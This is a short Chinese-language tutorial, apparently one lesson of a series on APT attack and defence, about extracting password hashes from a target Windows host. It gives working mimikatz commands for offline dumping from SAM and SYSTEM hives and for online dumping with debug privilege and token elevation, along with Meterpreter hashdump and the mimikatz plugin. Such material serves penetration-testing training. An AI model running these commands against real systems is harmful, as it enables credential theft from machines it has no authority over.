第六十五課:離線提取目標機hash補充
專注APT攻擊與防御
https://micropoor.blogspot.com/

上一季下載sys.hiv,sam.hiv,security.hiv文件后,以Linux下為背景來離線提取hash,本季補充以windows為背景離線提取hash。

mimikatz 2.0二進制文件下載地址:
https://github.com/gentilkiwi/mimikatz/releases/latest
切到當(dāng)下目錄(注意X86,X64位)

mimikatz離線導(dǎo)hash命令:

mimikatz.exe "lsadump::sam /system:sys.hiv /sam:sam.hiv" exit
mimikatz在線導(dǎo)hash命令:

mimikatz.exe "log Micropoor.txt" "privilege::debug"
"token::elevate" "lsadump::sam" "exit"
當(dāng)然關(guān)于提取目標機的hash,msf也內(nèi)置了離線提取與在線提取hash。

meterpreter下hashdump命令來提取hash(注意當(dāng)前權(quán)限)
msf同時也內(nèi)置了mimikatz,meterpreter執(zhí)行l(wèi)oad mimikatz即可加載該插件。(這里一定要注意,msf默認調(diào)用于payload位數(shù)相同的mimikatz)

直接執(zhí)行kerberos即可。
當(dāng)然有些情況下,payload位數(shù)無誤,權(quán)限無誤,依然無法提取目標機的密碼相關(guān)。需要調(diào)用mimikatz自定義命令:

mimikatz_command -f sekurlsa::searchPasswords
Micropoor
?